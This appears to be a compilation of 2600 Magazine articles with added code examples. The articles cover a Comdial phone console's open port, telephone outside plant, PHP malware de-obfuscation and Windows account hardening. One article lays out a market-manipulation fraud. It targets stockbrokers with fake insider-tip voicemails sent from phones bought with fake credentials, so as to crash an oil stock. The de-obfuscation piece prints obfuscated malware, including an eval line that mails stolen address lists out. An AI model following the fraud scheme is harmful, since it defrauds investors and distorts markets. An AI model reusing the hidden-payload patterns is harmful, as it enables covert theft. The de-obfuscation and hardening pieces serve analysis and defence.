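To make the exposure concrete, here is an added example (my code, not the article's or Comdial's) that parses the timestamped console lines shown above instead of piping them through grep: it pulls the firmware banner fields out, collects every LCDLine1 value, and collapses the keystroke-by-keystroke echo into the completed digit strings. That is exactly the information an administrator needs to write down when deciding whether a console that answers on port 9027 without a password belongs on the network at all. The sample log is constructed in the format the article shows; it is not a real capture.

```python
"""Parse the timestamped lines a Comdial console session prints and summarise
what an unauthenticated client on TCP port 9027 learns from them.

Added example, not the phone's software or the article's tooling.  The sample
lines are constructed in the format the article shows; they are not a capture.
"""
import re

LINE_RE = re.compile(r"^\[(\d\d:\d\d:\d\d\.\d{3})\]\s*(.*)$")

# Constructed sample: banner fields as in the article's session, then a
# debug-level-3 stream in which two numbers are keyed in on LCD line one.
SAMPLE_LOG = """\
[17:17:12.441] Phone Version: 3.0.026
[17:17:12.439] Phone Build Date: 06/05/2008 17:17:12
[17:17:12.450] Boot Version: 1.04
[20:55:52.687] LCDLine1: ENTER NUMBER
[20:55:54.728] LCDLine1: 1
[20:55:55.059] LCDLine1: 18
[20:55:55.358] LCDLine1: 180
[20:55:55.518] LCDLine1: 1800
[20:55:56.101] LCDLine2: DIALING
got keypad event
[20:55:58.003] LCDLine1: CONNECTED
[20:56:30.417] LCDLine1: ENTER NUMBER
[20:56:31.002] LCDLine1: 4
[20:56:31.410] LCDLine1: 41
[20:56:31.880] LCDLine1: 411
"""


def parse(log):
    """Split the stream into (timestamp, field, value) triples.

    Lines without a bracketed timestamp (the phone prints a few of those) are
    skipped; the field is the text before the first colon.
    """
    records = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, rest = m.groups()
        field, sep, value = rest.partition(":")
        records.append((ts, field.strip(), value.strip() if sep else ""))
    return records


def banner_fields(log):
    """Version/build/checksum fields: these identify the firmware to anyone
    who connects, which is what makes the open port an inventory concern."""
    return {f: v for _, f, v in parse(log) if f.startswith(("Phone", "Boot"))}


def lcd_line1_values(log):
    """Every value the phone pushed to LCD line one, in order."""
    return [v for _, f, v in parse(log) if f == "LCDLine1"]


def digit_strings(log):
    """Collapse the per-keystroke LCD echo into completed digit strings: each
    run of growing digit prefixes yields its final value."""
    out, current = [], ""
    for v in lcd_line1_values(log):
        if v.isdigit() and v.startswith(current):
            current = v          # one more keystroke on the same entry
            continue
        if current:
            out.append(current)  # display changed: the entry is complete
        current = v if v.isdigit() else ""
    if current:
        out.append(current)
    return out


if __name__ == "__main__":
    print(banner_fields(SAMPLE_LOG))
    print(digit_strings(SAMPLE_LOG))
```

The banner alone is enough to fingerprint the firmware build, so even a connection that is closed before any command is typed has told the client something; the LCD echo is the part that turns a debugging aid into a wiretap, which is the case to make for keeping this port off any segment that untrusted hosts can reach.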
Hello, and greetings from the Central Office! It's right around winter solstice here in the Pacific Northwest, where the sun comes up at around eight in the morning and sets just after 4 pm. And outside, it's rainy, windy, and miserable. Yes, just another day of relentless winter assault on the outside plant serving my Central Office.

Around here, most people go to work in the dark and come home in the dark in often dangerous driving conditions. Inevitably, a few cars get wrapped around utility poles this time of year, knocking out electric power and telephone service. Making matters worse, they don't call Washington the "evergreen state" for nothing. There are literally millions of Douglas-fir, Sitka Spruce, and Western Red Cedar trees (among others) standing over 200 feet high. Their branches are as large as entire trees in most other parts of the world. When the wind gets up to 100 miles per hour (as it did last year during the Hanukah Eve storm), falling branches can take out utility lines just as easily as falling trees. When phone lines aren't being knocked down one way or another, they're being pelted by rain, whipped by wind, and even stolen by thieves motivated by the high price of copper. Add to that the fact that telephone cables can be decades old, and it's sometimes a wonder that anything ever works at all.

A switch is no good if you don't have a continuous loop to it, and most of that loop is what we call the "outside plant." Why outside? It's outside my Central Office. Everything in here - the switch, frame, battery room, etc. (where it's loud, dry, and a balmy 68 degrees) - is the "inside plant." And outside it is... literally millions of miles of cable crisscrossing the globe and linking nearly every household in North America. Long distance trunks are redundant, and networks are designed in ring topologies such that a cable carrying your telephone call can literally be cut in two without any impact to your conversation. Many interoffice trunks are similarly designed. Unfortunately, the most vulnerable part of the network is the loop between the Central Office and your house.

Telephone cables typically either run on poles or underground. Inside of a cable, there are up to 4,200 twisted copper pairs. A pair of thin copper wires, known as tip and ring, is what brings a dial tone to your house. This forms a continuous (albeit often spliced) copper loop between the NID on the side of your house and the frame inside the Central Office. Inside a cable, up to 100 pairs are grouped together in a collection called a "bundle," which is wrapped in an inner sheathing, and then the bundles are wrapped together in a tough outer sheathing. There are many different types of sheathing, and the type used largely depends upon the area in which a cable is deployed and the age of the cable. For example, in Brazil (where termites are a huge problem), specialized termite-resistant outer sheathing is often used.

Hungry termites, of course, aren't the only enemy of a telephone cable, or even the most common one. Here in the Pacific Northwest, the weather is the biggest issue for linemen to contend with. Whether a line is downed by a fallen tree or crashed automobile, police and fire departments are often the first ones to respond. Safety is a major concern of first responders, as they don't always know whether a downed line is a dangerous high-voltage electrical line or a relatively benign telephone line. Fortunately, there is a service called One-Call, formally known as the Utility Notification Center. By dialing the appropriate telephone number, first responders report downed lines to One-Call as soon as they arrive on the scene. Based on the address and/or other identifying data (such as number plates on the affected telephone pole), One-Call then notifies the affected utilities of the outage, who each respond by rolling a truck.

Anywhere from a few minutes to several hours later (depending upon how nasty the weather is and whether the technician called is union or not - somehow, non-union techs don't seem to like getting up at 3 am in nasty weather for the measly $11 per hour their companies pay them), a truck will roll up to the scene. If multiple lines are down, multiple trucks from multiple utilities will roll. Unfortunately, if a power line is down, nobody can start repair work until the power utility shows up to de-energize the line.
Cable damage resulting from weather isn't
always as dramatic as drunks crashing into
telephone poles or tree limbs crashing onto
lines. Oftentimes, it happens slowly over many
years. Copper does corrode when exposed to
moisture, and sheathing on its own is insufficient
protection against the elements. In particular,
this is the case when cables are older than my
mother (as is the case in parts of New York
City), and are wrapped with little more than
treated paper. As anyone who has ever visited
Manhattan knows, there are underground steam
lines everywhere - and they leak. This blasts
hot, moist steam at anything in the vicinity,
including telephone cables. Verizon solves the
problem there by pressurizing underground
cables with cold nitrogen, delivered from tanks
placed throughout the city. This keeps cables
dry and mitigates the corrosive impact of
steam, as nitrogen is an inert gas. Similar tanks
are used by AT&T in the Houston area, due
to the moist climate there. You can see them
placed at many junction and other equipment
boxes. Conversely, in desert areas, such as
the Valley of the Sun in Arizona, no measures
beyond heavy-duty sheathing are taken to
protect cables. This is because what little rain
falls in the area evaporates quickly, and rarely
penetrates far enough (or hangs around long
enough) to result in corrosion damage.
Here in the Pacific Northwest, nitrogen
tanks are rarely used. Most of our outside
plant dates from the 1960s or later, although
in a handful of places there is still cable in use
dating from the turn of the 20th century. In this
area, most cables are filled with a substance
called icky-pic. How did it get its name?
Well, icky-pic is the vilest substance known
to mankind. If you get it on your clothes, in
your hair, etc., you'll never get it out. It sticks
to everything, ruining whatever it touches.
Including your eyes; if you get it in your eyes,
it will literally blind you. Oh, and to top it off,
the stuff is actually flammable (being petroleum
based), so it should never be used indoors. But
icky-pic is inert, and water can't penetrate it,
and it's flexible (because it's a gel) so you can
fill cables with it. So for this area, it's a perfect
solution. That is, until the outer sheathing of
the cable eventually ruptures after 40 years of
neglect and the icky-pic leaks out. Eventually
the cable will corrode, and a splicer will have
to repair the damage.
Splicers, incidentally, repair all sorts of
interesting damage, on both fiber-optic and
copper cables. From euphemistically named
"backhoe incidents" (yes, any idiot with a
backhoe can knock out phone service to over
1,000 homes) to underwater lines caught by
boat anchors to more garden-variety damage
such as drug addicts cutting out sections of
cable to sell as scrap (yes, this really happens),
these folks have a very tough job. Piecing
4,200 individual pairs back together is a very
detail-oriented job, but good splicers need to
work fast. After all, if a splicer is on the job, it
usually means a lot of folks are without phone
service.
Working as a lineman can be a dangerous
job, since it involves working around electrical
cables and more than occasionally working
around slipshod, improperly grounded cabling
done by low-bidding non-union contractors.
For example, bucket trucks come in grounded
and non-grounded versions, so, as you might
imagine, it's highly important for linemen to
know which tool is appropriate for the job.
While linemen are not electricians (different
union), they are trained in the portions of the
National Electrical Code (NEC) applicable
to their jobs. Safety meetings, while both
frequently required and the bane of any
lineman's existence, are an important tool
used to communicate the latest procedures
and information.
And with that, it's time for me to take a
nap here at the Central Office. Safety meetings
are the bane of my existence too, and I have
a required one today. But it's online, so I can
sleep through it without anyone noticing!
References
• http://www.callbeforeyoudig.org/ - One-Call Utility Notification Center for the Pacific Northwest.
• http://www.arkema-inc.com/index.cfm?pag=633 - Description of termite-resistant cable sheathing.
• http://gothamist.com/2008/01/31/nitrogen_tanks.php - Article on nitrogen tanks in New York City. In particular, see the comments from SplicingDan.
• http://www.psihq.com/iread/strpgrnd.htm - Proper grounding is very important in outside plant. This is a great walkthrough of the NEC (National Electrical Code) requirements for grounding.
• http://www.sundance-communications.com/cgi-bin/ultimatebb.cgi?ubb=get_topic;f=31;t=000009;p=0 - Great message board thread on proper grounding of punch-down blocks, which is particularly interesting because of the interplay of issues that can occur during backhoe incidents. Incidentally, this particular message board is very informative on the subject of outside plant.
by Cliff
Imagine you're a lame web designer. How do you protect your precious HTML, as if nobody's ever seen HTML before? Imagine you're adding some kind of validation to a web page, but you don't want the validation algorithm to be publicly visible. Or you're trying to hide your malicious code in an otherwise innocuous page? You use obfuscation.

Obfuscation doesn't make code impossible to read, it just makes it a pain in the ass, and not worth bothering with for the average user. The great thing with scripting languages is that they are interpreted plaintext. In order for the script to run, it has to be human-readable at some stage - all you need to do is to de-obfuscate it, and read what the author didn't want you to read. The more someone doesn't want me to read something, the more curious I become!

Common scripting languages include PHP, VBScript, and JavaScript. Each has their own syntax and use, but have lots of common programming constructs. For instance, PHP runs on the server, but not on a browser, JavaScript can run on either, and VBScript is most suited to server-side execution. The one instruction every code obfuscator uses is eval(), which works just about the same in each of these languages. The eval("string") will execute the code contained in the string variable "string", whatever it may be. That code may be in cleartext, or it may be a short program, to hide the cleartext using other functions which vary with the scripting language used.

Here's a simple, real-life sample I took from a PHP script. This PHP script was called the "Yoga0400 Mass Mailer." It was forwarded to me by someone who found a copy on their honeypot. It was a generic PHP HTML interface for the box's own SMTP server, and it looks as if it was handed out freely to spammers to use as a service to humanity. Some service - it contains a line:

echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFjaOBob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmEONCk7"));

Which made me curious - what did it do that someone who gives away a spamming script might want to keep a secret? This was an easy one, and feel free to play along at home... I looked up PHP's base64_decode function, and thanks to the excellent http://php-functions.com/ and similar sites, I was able to decode the string in a blink. Simply copy and paste the string "bWFpbCgiZ3JvZmlfaGFjaOBob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmEONCk7" (without the quotes) into the base64_decode box and hit "Submit". You should see the result:

mail("gxxxx@hotmail.com", $subj98, $msg, $message, $ra44);

(OK, so I've x'ed out a few characters, you can find them yourself if you care to.)

This secret script would take a copy of all the email addresses the spammer was using, and send it to gxxxx@hotmail.com - gxxxx was using this giveaway tool to build up his own spam lists! No honor amongst thieves. For what it's worth, I believe hotmail killed that address off a while ago. It's very hard to shed a tear for someone stealing a spam list from another spammer; either way it's the innocent inboxes that get hosed!

This was an example of the base64_decode() function in PHP being used to obfuscate cleartext code. Another commonly used function is gzuncompress(),
another layer of trying to hide what happens beneath the covers. For instance, a very innocent looking three lines that I've snipped heavily here - one of those three lines is very, very, very long indeed - would have filled several pages of 2600 for just that expression. It's the obfuscated bit:

<?php // This file is protected by
// copyright law and provided under
// license. Reverse engineering of
// this file is strictly prohibited.
$OOOOOOOOO=__FILE__;$OOOOOOOOO=__LINE__;
$OOOOOOOOO=42896;eval(gzuncompress(
base64_decode('eNplj8duwkAYhF<<snip about 300 chars>>T47xDRfgD5Al8g')));return;?>GYQYAfsKIOEW/cBaMlx
rEmJqy6xkdCvAsLRv6TViHHeQFVmVAsp<<snip about 40kb of similar stuff>>7G/T/ntYYFI==

The first line is easy - someone prohibiting me from seeing what code they want to run on my computer? I ignored it, so sue me. Next we have a few variable declarations in a single line. Unkindly, the person obfuscating the code used a real mix of characters here - Courier New renders them all the same (see above), so let's try a different font. Wingdings shows us what's going on here rather well:

[Wingdings rendering of the three $OOOOOOOOO variable names, showing which characters are the letter O and which are zeroes; not reproducible as text]

That seeming $OOOOOOOOO is actually a mix of O's and zeroes, slippery. Of course, the second and third variable are different mixes of O's and zeroes. This is clearly going to be a battle, lucky I'm so obstinate! I did a bit of renaming myself:

// $OOOOOOOOO=__FILE__;
$file=__FILE__;
// $OOOOOOOOO=__LINE__;
// $line=__LINE__;
$line=47;
// $OOOOOOOOO=42896;
$offset=42896;

I figured $file, $line and $offset would be more useful names initially to get me rolling, and so used search and replace, and not for the last time. Particularly neat was the use of __FILE__ and __LINE__, which meant adapting the code would damage it, hence the hard-coded value for $line. I worked out why it was so important, and what the line number would be once I'd tidied the code up. This was a very clever obfuscation! Continuing, I tidied the code a bit:

$a1='eNplj8duwkAYhF/GOu4qRlmI44As
H+idpbdL5PK7gBu7LsDTBxREhKKZ02j
mkOZilFJ2E9WdOIEIS4yx30BG3EREKzw/
AFwqSexevJs4LqQCS8+pXKYVhWj/
YoXWVKLdiI+17l6zylrDhIMQ2DQEqMq3D
VZsAxYpTzl20Bj2C6JKiYzaUQr8EmfFO
Zv3dsPJhq2WdaNhNq2W3XG6bt8fHEbB
OJwms9NCrPPteX+l5cqH8ql+VWtv7zq5Ub
3RbLU73V5/MByNJ2w6my+Wq/Vmu9sbp
mWD43r+4RiEUZycuEizvDhfXhiIE
KJBbgT47xDRfgD5Al8g';
$a2=base64_decode($a1);
$a3=gzuncompress($a2);

Next I did the base64_decode() then using a 30-day trial of a PHP debugger, did the gzuncompress on the result. What I got was...

// eval sequence $a3
$OOOOOOOOO=fopen($OOOOOOOOO,'rb');
while(--$OOOOOOOOO)fgets($OOOOOOOOO,1024);
fgets($OOOOOOOOO,4096);
$OOOOOOOOO=gzuncompress(base64_decode(strtr(fread($OOOOOOOOO,480),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OOOOOOOOO);

Cheeky! More of the O's and zeroes. Reformatted and renamed...

// next lines address the data lines
$stream1=fopen($file,'rb');
while(--$line)fgets($stream1,1024);
fgets($stream1,4096);
$b1=fread($stream1,480);
//$b1='W/<<lots of snippage>>1/8lsR3kgX3JRrh9Em';
$b2=strtr($b1,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$b3=base64_decode($b2);
$b4=gzuncompress($b3);

So the original third line comes into play - the 40kB is all data for the routine obfuscated in the second line. The script opens its own file, reads the data line, uses strtr to translate characters, then performs another base64_decode and gzuncompress on the resulting data. Interestingly, here we see evidence that this has been obfuscated with a tool of some sort - the strtr string starts "Enteryou" which is quite possibly the start of "Enter your seeding string here" or some similar default value. Not that anyone but a madman would roll this stuff by hand, of course. Or reverse engineer it.

By now, I was feeling mightily proud of myself. I was clearly getting closer. $b4 contained another blooming mash of O's and zeroes, base64_decodes, gzuncompresses, freads, strtr's, and a new one for me, ereg_replace, which when tidied gave us...

$c2=fread($stream1,$offset);
$c3=strtr($c2,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$c4=base64_decode($c3);
$c5=gzuncompress($c4);
//$c1=ereg_replace('FILE',"'".$file."'",$c5);
$c6=strlen($c5);

Now I wondered if I was going in circles? Earlier I had for 90 minutes. The code is so cleverly recursive that if you miscount a position, etc, you literally end up in a loop. Utterly brilliant, but that meant the code had to succumb to me or kill me trying.

print($c6);
print($c5); // dump the secret script
fclose($stream1);
return;
?>

I have to admit, my worksheet was getting crazily messy by now, and some of my workings may well appear to be missing steps - this article is about the principle though, not this script. But this was it, I now had the final script, hidden deep inside some crazy obfuscated code. The first thing AVG did when I tried to save the file was to panic. I knew I'd hit paydirt. And indeed it was an exploitation toolkit designed to run on Unix and Linux variants, very cute indeed. I'm afraid I won't list the actual code here. It's not relevant and it's not nice, and frankly I've lost a chunk of it.

But this journey is typical of the work you have to put into seemingly impossible de-obfuscation of scripting languages. They're usually obfuscated with software tools, they're usually several layers deep, and they try every kind of diversion they can to throw you off the scent, into loops, etc. I learned more about the internals of PHP de-obfuscating this code than any tutorial has ever taught me.

There are other techniques in use to try to protect scripts - you might find scripts referenced in a client-side include, for instance, in the hope that as they don't appear in your browser, you can't see the script. Try your browser cache for these scripts. Javascript has its share of obfuscated code too - again you'll see string replacements, offsets, loops within loops, obscure programming constructs, anything to throw you off the scent - but remember, it will always give you a cleartext version of the script in the end, otherwise the engine couldn't run it.

The best thing you can do from here is to find some obfuscated code, and have a go yourself - it's quite rewarding when you finally see what someone has worked so hard to stop you from seeing. Often, it's quite mundane - some idiot has thought you really want to copy his crappy alert('Page Protected by xxx') script - but sometimes you hit the weird and wonderful stuff, and it's quite informative.

Well obfuscated code will not give up any secrets in a regular debugger either - taking it out of context can cause problems, or executing a whole line at a time will prevent you from stepping through every iteration of an obfuscation. You need to pull the code to pieces to see what happens at the heart. Work methodically, evaluate terms one at a time, rename stupidly named variables, but be sensitive to any environment variables like __LINE__ which can trip you up. Each step reveals more puzzles to solve, but in the end you can discover some of the guilty secrets of the web! It's a good hobby. Maybe post some of your steps, discoveries, and gotchas to 2600 too, so we can all learn a bit more too. Thank you for your attention and interest. I hope this has inspired you somehow.
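The base64_decode() layer in the mass mailer and the nested gzuncompress/strtr layers walked through above are the same three operations applied over and over, so here is an added example (my code, not Cliff's and not any obfuscation tool's) that peels them automatically. It uses the custom alphabet from the strtr() call shown above, treats that 65-character source string the way PHP's strtr() does (the trailing '=' has no counterpart, so it is left alone), and checks for the zlib header that gzuncompress() expects; as a generalization beyond the article it also falls back to raw deflate for scripts that use gzinflate() instead. The sample script is constructed inside the block with pack_layer(), two layers deep, because the article's real payload is not reproduced here.

```python
"""Peel the PHP obfuscation layers the article walks through by hand:
eval(gzuncompress(base64_decode('...'))), optionally with a strtr() that
swaps the base64 alphabet first.

Added example, not the article's or any tool's code.  OBF_ALPHABET is the
source string of the strtr() call quoted in the article; the sample script is
constructed here with pack_layer() so the peeler has something to work on.
"""
import base64
import re
import zlib

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Ends in '=' with nothing to map it to, so PHP leaves '=' alone and only the
# 64 alphabet characters are substituted.
OBF_ALPHABET = "EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/="


def strtr(text, frm, to):
    """PHP strtr($str, $from, $to): a character map; extra characters in the
    longer of $from/$to are ignored, as PHP does."""
    n = min(len(frm), len(to))
    return text.translate(str.maketrans(frm[:n], to[:n]))


def has_zlib_header(raw):
    """RFC 1950 check: CM == 8 and the first two bytes are a multiple of 31."""
    return len(raw) >= 2 and raw[0] & 0x0F == 8 and ((raw[0] << 8) | raw[1]) % 31 == 0


def looks_like_zlib_b64(blob):
    """True when the first base64 quantum decodes to a zlib header, i.e. the
    blob is gzuncompress() input; 'eNp' (78 DA) and 'eJz' (78 9C) are typical."""
    return has_zlib_header(base64.b64decode(blob[:4]))


def inflate(raw):
    """gzuncompress() for zlib-wrapped data, gzinflate() for raw deflate."""
    if has_zlib_header(raw):
        return zlib.decompress(raw)
    return zlib.decompress(raw, -15)


# Matches eval(gzuncompress(base64_decode('BLOB'))) and the variant that runs
# strtr('BLOB','FROM','TO') on the blob first.
LAYER_RE = re.compile(
    r"eval\(\s*gzuncompress\(\s*base64_decode\(\s*"
    r"(?:strtr\(\s*'([^']*)'\s*,\s*'([^']*)'\s*,\s*'([^']*)'\s*\)|'([^']*)')",
    re.S,
)


def peel(source, max_layers=16):
    """Return [source, layer1, layer2, ...] down to the first text that no
    longer matches the eval pattern.  Bounded so a blob that decodes back to
    something referencing itself cannot spin forever."""
    layers = [source]
    for _ in range(max_layers):
        m = LAYER_RE.search(layers[-1])
        if not m:
            break
        if m.group(4) is not None:
            blob = m.group(4)
        else:
            blob = strtr(m.group(1), m.group(2), m.group(3))
        layers.append(inflate(base64.b64decode(blob)).decode("latin-1"))
    return layers


def pack_layer(inner, frm=None, to=None):
    """Build one layer in the same scheme.  Used only to construct the sample
    below; the article's packer was a commercial tool."""
    b64 = base64.b64encode(zlib.compress(inner.encode("latin-1"))).decode("ascii")
    if frm is None:
        return "<?php eval(gzuncompress(base64_decode('%s')));" % b64
    # Apply the inverse substitution so the script-side strtr(frm, to) undoes it.
    return "<?php eval(gzuncompress(base64_decode(strtr('%s','%s','%s'))));" % (
        strtr(b64, to, frm), frm, to)


# Constructed sample: plain layer outside, alphabet-swapped layer inside,
# cleartext script at the core.
INNER = "<?php echo 'cleartext at last'; ?>"
SAMPLE = pack_layer(pack_layer(INNER, OBF_ALPHABET, STD_ALPHABET))

if __name__ == "__main__":
    for depth, text in enumerate(peel(SAMPLE)):
        print(depth, text[:60])
```

Running the block prints each layer as it is uncovered. The max_layers bound is the defence against the loop described above: a blob that decodes to something which re-references itself stops after a fixed depth instead of spinning. The header check is worth remembering on its own: a blob beginning "eNp" or "eJz" is base64 of 78 DA or 78 9C, the zlib header, which is why the $a1 string above was visibly gzuncompress() input before any decoding was done. Real samples that read their payload from the file itself with fread(), as this one did, need the file offset handled as well; the regex here covers only the inline-string form.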
by Isreal

The following is an educational article and should be treated as such. I, the author, hold no responsibility for anyone who uses this information in an illegal manner. With that out of the way, let's explore how a small bit of low-tech social engineering can exploit gas prices and the foundation of the economy.

A year or two ago I read about a group of phreakers who were conning folks. At the time no one could seem to catch them or get any kind of leads. Apparently the scam went like this: a tiny company on the stock market that had very low stock prices would be selected, and they would send text messages or voice mails to many people, pretending they had a piece of inside information.

Inside information is illegal on the stock market. Keep this in mind because the victims in this scam do not want to report themselves breaking the law! Notice, I said texts and voice mails, not real phone calls. This is important because most people would not just pass out inside information on a hot stock tip to just anybody. This would allow the phreakers' messages to come across as wrong numbers, but still get the point across.

Most of the time, reports said that voice mail was left by an attractive sounding woman's voice. (Probably to keep men listening.) They would usually be in a panic talking hurriedly and sneakily, saying that they just found out some news around "the firm" about XYZ stock and that someone should be quickly buying it. They might even hint that they are talking about inside information but usually not say it outright. Eventually, after enough messages were sent, the stocks would in fact start to jump a little. The great thing about the stock market and disinformation like this is that if enough people start buying to make a difference, it becomes a real gain. Other investors start seeing this and they too start buying it.

But supposedly the phreakers would sell out when the worthless stocks peaked and take the profits. Real investors would sell and then all the saps would be left with these crappy little stocks.

All this sounds grand but how could this information be helpful? Or rather, could it be useful in reverse? Every day I go to the gas pump I get mad. Who doesn't right now? But the price of gas is mostly decided by two things: supply and demand. Supply is nothing we can really control. (Unless you work for OPEC.) However, demand is generated by two things: consumption and stocks!

So, if you redid the scenario, only you told people to sell, this would be equally economically manipulative. It would also be more plausible to just target one oil giant, say Exxon-Mobil for example. If one company's stock started a drastic drop, it could cause a panic on the whole oil market. Not to mention it sounds more believable that one would have inside information on one company, not an entire industry. Even if you only dent that one company, the others will follow the price they charge to not be outsold by a competitor.
Page 18 ------------------- 2600 Magazine
Now that we have a method and a target we need to find a means of injection. This part would work differently because we are now selling, not buying. Anyone can buy stuff, but to sell we need to find people who own these stocks. I suppose an elite hacker could break into a database full of share holders' contact numbers, but that is beyond the scope of this article. Here we are going to use our good friend Google! A simple search of "Stockbroker + MyTown" will probably render many results, as it will for any other town you type in. Stockbrokers are never supposed to spread inside information. (And cops are never supposed to break the law...) It happens that it's their job to suggest to people what to buy, what not to buy, and sometimes what to sell. Reaching them will help reach the people who keep them in a job by buying and selling stock. Any respectable broker these days will have a website with a phone number on it. Not to mention, many of these guys have watched the oil companies' shares skyrocket the last few years and own some themselves!
Now, there are a multitude of ways we could send these aggressive texts and voicemails - by phreaking, Bluetooth hacking, VoIP, etc. These are all great ideas, but again they fall outside the scope of a mere social engineering article. For now, let's reproduce this experiment very low-tech. Most of us have seen the prepaid cell phones in stores. Fake credentials are usually easy to come by, if the carrier even checks them at all. Or a good eBay phone with a prepaid GSM SIM card will work fine too.
It may take thousands of calls to make a real dent in a stock's price. After all, if you call 2000 brokers, not everyone will have that stock. If they do, they may not think that the wrong number they got was from someone who really knew what they were talking about. They may also have a legal or moral issue with acting on inside information, but that won't stop them from watching!
Here's the catch: Once the stock has started to slide, it is no longer inside information, it's just a bold fact. You're no longer acting on illegal advice, you're acting on the actual flow of the market. People who had ethical questions before will no longer have an issue and will sell. The people who didn't believe you before will see it start slipping or sliding and sell. Finally, the other investors who you never even contacted will see this and if you've made a big enough dent, they will sell too! This could cause a panic and perhaps prompt a sell-off in oil stocks you did not slander as well. When market shares plummet, so does demand and price.
This would be one way to lower the price of gas... If it were legal.
Winter 2008-2009 ------------------ Page 1 9
Making Your Windows Box A Little More Secure
by DieselDragon

0x00. Introduction:
Following a long period of playing around with the various security tools and features in Windows, I thought that I'd share some of my findings. Hopefully, this might help those of us "locked in" to using the Windows family in protecting our machines a little bit better than they are normally. The things detailed here have been tested and applied on a machine running Windows XP Pro SP2, but should hopefully be supported in all versions of Windows 2000, XP and Vista.

0x01. Who this guide is for:
Most articles in 2600 seem, to my eye, to be written mainly for those lucky enough to be able to understand and use Linux without experiencing serious implosion of the brain. Sadly, some of us are classic victims of vendor lock-in and, try as we might, find that the only kind of OS we can efficiently use is one of the Microsoft Windows family of operating systems. This article is primarily aimed at general users of Windows, and concentrates mainly on applying secure practices in Windows XP. The methods and practices used here should also be adaptable for use in Windows Vista and other operating systems.
This article has been written so that it can be used easily by those without much computer know-how (such as the less computer-savvy friends of regular readers) and as a result a lot of the wording may appear very simple and newbie-friendly to more experienced readers. Please accept my apologies in advance if this article is too simplistic or verbose.

    If You("Experienced user") = True Then
        Goto 0x07
    End If

0x02. Security in Windows - A brief intro:
With the exception of Windows CE and ME, the Windows operating system has been based on NT technology from Windows 2000 onwards. One of the major benefits of this change has been a switch-over from using the FAT filesystem - which had been in use since 1980, and had no support for user accounts and file security - to the NTFS filesystem, which supports user accounts and allows for user-specific access control to individual files and folders.
In short, this means that any user on a Windows 98/ME machine can install programs and make changes to the operating system without needing administrative privileges, whereas users on Windows 2000/XP/Vista computers who don't have administrator privileges cannot generally make any changes except creating and changing files inside their own document folders. In addition, the same security measures also mean that User A cannot read or change User B's files unless User A has administrative privileges, or User B has specifically allowed User A access to those files.

0x03. A hypothetical case-study:
Let's take the Doe family: John and Jane Doe, and their three children: Claire, Mark, and David. They bought their home PC from a major computer store about two years ago. It came with Windows XP Home Edition. John uses the computer for editing sensitive work documents that include private financial and client data. Jane runs a business from home and uses the computer to keep track of business finances, word processing, client management, and online banking. The children mainly use the computer for surfing the Internet and using various instant messaging applications, although Claire also manages an ever increasing music library using iTunes, Mark creates and edits music using several studio packages, and David plays just about any half interesting game that can be freely downloaded from the Internet.
When they set up their computer, the Doe family simply plugged it in and turned
it on, giving no thought to computer and user management. They created user accounts for everyone using the Windows default settings - unwittingly giving all five users full administrative privileges, and allowing anyone logged in to the machine to install programs and change any aspect of the operating system.
At this stage, everyone has become extremely annoyed with the computer. Over time it has gradually slowed down and become increasingly unreliable. Their anti-virus programs (of which they have several) continually warn of viruses and malware that keep appearing over and over, and nothing they try seems to get rid of them. They can't seem to figure out how all of this malware keeps making its way through the firewall and installing itself onto the computer. In addition, unusual transactions from foreign countries have recently started appearing on Jane's business account with an ever increasing frequency.
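As an added example, not part of the original article, here is a PowerShell audit for the two mistakes in the Doe family's setup: everyday accounts sitting in the local Administrators group, and a fixed disk still formatted FAT. The list of accounts allowed to keep admin rights is an assumption of this example ("SuperUser" being the maintenance account the article recommends later on).

```powershell
# Added example (not the article's own code): audit a Windows 2000/XP/Vista
# machine for the two mistakes in the Doe family's setup: everyday accounts
# in the local Administrators group, and a fixed disk still formatted FAT.
# The list of accounts allowed to hold admin rights is an assumption here;
# "SuperUser" is the maintenance account the article goes on to recommend.

$AllowedAdmins = @("Administrator", "SuperUser")

function Get-LocalAdminMembers {
    # The WinNT ADSI provider is present on every NT-based Windows and needs
    # no extra modules, so this works on XP with PowerShell 1.0 as well.
    $group = [ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group"
    foreach ($m in @($group.psbase.Invoke("Members"))) {
        # Members come back as raw COM objects; read Name and Class through IDispatch.
        $name  = $m.GetType().InvokeMember("Name",  "GetProperty", $null, $m, $null)
        $class = $m.GetType().InvokeMember("Class", "GetProperty", $null, $m, $null)
        $entry = New-Object PSObject
        $entry | Add-Member NoteProperty Name  $name
        $entry | Add-Member NoteProperty Class $class
        $entry
    }
}

function Get-UnexpectedAdmins {
    # Local user accounts (not nested groups) that hold admin rights but are
    # not on the allowed list: the "everyone is an administrator" accounts
    # that the XP first-run screen creates by default.
    param([string[]]$Allowed = $AllowedAdmins)
    Get-LocalAdminMembers | Where-Object {
        $_.Class -eq "User" -and ($Allowed -notcontains $_.Name)
    }
}

function Get-NonNtfsVolumes {
    # DriveType 3 = local fixed disk; FileSystem reads "NTFS", "FAT32" or "FAT".
    # A FAT volume has no ACLs at all, so restricted accounts mean nothing there.
    Get-WmiObject Win32_LogicalDisk -Filter "DriveType = 3" |
        Where-Object { $_.FileSystem -ne "NTFS" } |
        Select-Object DeviceID, FileSystem
}

$badAdmins = @(Get-UnexpectedAdmins)
if ($badAdmins.Count -gt 0) {
    "Everyday accounts with administrative rights (make these restricted):"
    $badAdmins | ForEach-Object { "  " + $_.Name }
} else {
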